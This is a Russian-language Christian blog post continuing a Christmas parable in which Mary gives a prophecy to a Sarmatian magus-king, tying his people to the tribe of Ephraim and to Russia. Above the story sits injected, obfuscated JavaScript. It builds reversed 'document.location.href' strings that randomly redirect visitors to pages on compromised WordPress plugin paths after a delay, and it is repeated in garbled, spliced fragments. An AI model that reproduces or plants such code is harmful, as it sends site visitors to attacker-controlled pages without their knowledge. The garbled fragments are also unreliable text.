$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Что ж, друзья, если вам понравилась моя Рождественская сказка, или Легенда, если вы узнали в ней – хотя бы немножко, и как и сквозь мутное стекло – самого себя, духовную историю славянских народов, если начали находить ответы, или даже интересные и неожиданные вопросы – то вы захотите услышать и продолжение этой Рождественской сказки, или почти сказки. И мне тоже не терпится его написать. И делать это я буду опять в таком же свободном стиле – играючи «тремя нитками». Итак, мы оставили наших царей в Вифлееме мирно спящими. И лишь один из них не спал. И о нем-то, да и о народе, который он представлял – и пойдет речь в наших дальнейших публикациях.
Читать первую часть истории
Читать вторую часть истории
Вернёмся в Вифлеем
Только под утро, когда гости наконец утолклись и заснули – кто на крыше, кто на полу, кто прямо во дворе – Мария наконец решилась подойти к старшему царю, который неподвижно сидел перед спящим теперь Иисусом, и не мог насмотреться на Него.
— Простите, — сказал он, поднимаясь с места. – Я засиделся. Мне надо идти, прислуживать господам волхвам.
— Господа волхвы уже крепко спят, — загадочно улыбнулась Мария. – Знаете, я хотела вам что-то сказать… Я все видела… Слышала… Так вышло.
Царь в смущении прятал глаза.
— Я… я очень сожалею, — начал он.
— Не надо, не надо сожалеть, — уверила его Мария. – То, что вы сделали… Вы знаете, когда Он вырастет – я непременно Ему об этом расскажу. И о вашем визите, и о том как вы, царь царей, ноги омыли своим товарищам – тоже расскажу.
Царь сидел, потупив глаза. Ему нечего было сказать.
— Я хочу, — тихо добавила Мария, — чтобы Он знал о вас, как об истинных мудрецах. И я позабочусь, чтобы так и было.
Великий царь встал и отвесил низкий земной поклон Марие.
— И откуда это мне, что Матерь Царя моего почтила меня? Воистину, Бог явил силу мышцы Своей, рассеял надменных помышлениями се́рдца их, низложил сильных с престолов, и вознес смиренных.
— Благодарю тебя, великий царь, — низко поклонилась ему в ответ Мария. – Но я лишь служанка твоя. Но у меня, — добавила она. – У меня есть для тебя весть.
— Весть? – не понял царь. – От кого?
— От Бога, — тихо сказала Мария.
Великий царь стоял неподвижно, лицо его тоже застыло.
— Это – добрая, благая весть, — улыбнулась Мария старому царю Сарматов лучистой улыбкой. – Для всех народов и племен у меня есть добрая весть. Но все же, — добавила она, — у меня есть особая весть для тебя.
Великий царь превратился весь в слушание.
— Так вот, — продолжила Мария, — однажды мне явился Ангел и сказал мне, чтобы я передала эту весть тому из царей, кто придет как меньший, как слуга. Слушай же, о благословенный от Господа, ветвь Иосифа, семя Ефрема.
Великий царь стоял ошарашенный, не понимая, почему его так называют. А Мария продолжала, она говорила, и великий царь безошибочно видел в ней отражение того ангела, который дал ей эту весть. Для него.
«Так говорит Господь: ты велик, но сделаю тебя еще более великим, и исполню на тебе все обетования, которые я дал рабу моему Иакову, и Иосифу, сыну его, и Ефрему, возлюбленному Моему. И придет время и выведу тебя из тьмы язычества, и во свет язычникам тебя поставлю, и дам тебе землю благую и обширную, и сберегу тебя. И придет время, и восстанут против тебя братья, и предадут, и продадут тебя, как Меня продали, как и раба Моего Иосифа, господина Египта, продали.
И забудут, что ты брат им, и злословить тебя будут, и враждовать против тебя. Но как ты привел их сюда в этот раз, так приведешь их и еще, и будешь светом с Востока, и встанешь во главе царей с Востока – последних царей, прежде чем царство перейдет Богу и Сыну Его. И будут снова ублажать и почитать тебя братья твои. И множество святых мужей Божьих родит тебе земля твоя.»
Мария замолчала и закрыла глаза. А он все стоял, вытянувшись перед нею, как солдат. Наконец, она открыла глаза, будто просыпаясь ото сна, улыбнулась тихой улыбкой и поднялась на ноги.
— Ступайте отдыхать, — сказала она. – Пророчество это относится к отдаленным временам. Еще успеете подумать.
— Позвольте только один вопрос, — попросил великий царь, склоняя перед Марией свою седую голову. – О каком таком Ефреме, и о каком благословении говорил ангел?
Мария улыбнулась.
— Так я и думала, — сказала она. – Не знает. Но это не беда. Примите, читайте. Там все написано. И про Ефрема, и про отдаленное будущее. И про потомков твоих и народа твоего.
Она протянула ему увесистый свиток.
— Это – тоже от Ангела? – изумился царь, гладя на казавшийся совсем новым пергамент священной книги, целуя его.
— Вообще-то это от меня, — улыбнулась Мария. – Я его переписала. Но я перепишу еще раз – вот для Него, — она кивнула на тихо сопящего на циновке Иисуса. – Это – Библия. Закон, мудрость и пророки. Читайте. И вы поймете все. Вы же – волхвы, ищите мудрости?
— Мы ее уже нашли, — тихо сказал старый царь и улыбнулся доброй улыбкой. – Вон она, премудрость Божия – спит и сопит.
— Вот о Нем и говорят весь Закон, и вся Мудрость и все Пророки, — сказала Мария. – Только я сама пока очень мало знаю. Но мне еще предстоит многому научиться. Буду вот снова учиться с Ним. Доброй ночи, — сказала она с приветливой улыбкой. – Я думаю, это очень добрая ночь. Хотя уже утро… Значит, заодно и доброго утра.
Царь взошел на крышу дома. Было тихо, если не считать похрапывания царей, да звон ночных цикад. Он посмотрел наверх. С неба, совсем невысокого, на него смотрела звезда. Та самая звезда, которая привела его, всех их – с Востока, сюда. Долго вела. Он улыбнулся этой звезде как старой знакомой. Она, кажется, тоже улыбнулась ему. На сердце у царя было светло и спокойно. Эта звезда будет светить его детям и внукам, всему народу его – доколе не придет Царь Царей в силе и величии. А до тех пор звезда эта будет светить царям с востока, и всем ищущим Его, и всем ищущим мудрости, ищущим правды. Звезда эта – а это были ангелы, теперь он мог отчетливо это видеть, всматриваясь в небеса – она будет приводить к Нему ищущие души снова и снова.
— Ефрем, Ефрем, — тихо повторил он, укладываясь на ночлег, хотя скоро уже начнет светать. – Почему Ефрем? Кто такой – этот Ефрем?
Но мысль о том, что у него теперь есть бесценное сокровище – Закон, Мудрость и Пророки – успокоила и согрела его. В свое время он все узнает. В конце концов, волхв он или нет? Искатель мудрости, или кто? Мария сказала, что время у него для этого еще будет. Значит – будем учиться, подумал он.
С этими приятными и светлыми мыслями и заснул великий Скифский государь, царь царей скифских и народа сарматского. И снилось ему в ту ночь, что его народ, сарматы, на самом деле самаритяне, потомки самого благословенного колена Иакова. Да и сон ли это был?
Что же дальше?
И мы тоже, вместе со смиренным и мудрым царем, посмотрим еще с вами – что общего между Россией и библейскими пророчествами о величии потерянного и найденного народа Ефрема в последние дни земной истории. Когда мне, как богослову, требуется войти к себе за справкой, как к историку – я вхожу обычно без стука и лишних церемоний, и так же просто ухожу. Равно и как историк, я могу навестить себя, богослова, и у нас может завязаться диалог. А когда в гости зайдет еще и писатель, то тут вообще пойдет беседа. А в беседе – главное внимание и уважение к собеседнику, и еще – быть не слишком строгим судьей.
И я прошу читателя тоже не быть ко мне очень строгим. Я ничего не хочу доказать, никуда повести, а лишь рассказать историю, которая трогает мое сердце и ум, историю, которая укрепляет мои силы и дает надежду. И которая мне интересна. Пусть даже это будет притча, или Легенда. Но это – добрая притча. В конце концов даже Господь наш Иисус Христос любил говорить притчами. А ученик не выше своего Учителя.
Я буду продолжать рассказывать, если хотите, сказку, но такую, из которой вы узнаете много правды. Я выполнил свое домашнее задание по истории и богословию, и теперь просто наслаждаюсь полученным. И вас тоже приглашаю на свой пир о многих яствах и питиях, на наш неформальный, вечерний ужин. Можете посмеяться, пока кушаете, над моими сказочками – я не обижусь и посмеюсь с вами. И вас я постараюсь ими не обидеть. А кто-то может и поплачет над ними, кто-то задумается. Эти притчи написаны для вас, друзья, с любовью, а что с любовью сделано, то непременно откликнется в ищущих Бога.
Не уходите далеко, друзья. Самое важное еще впереди.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments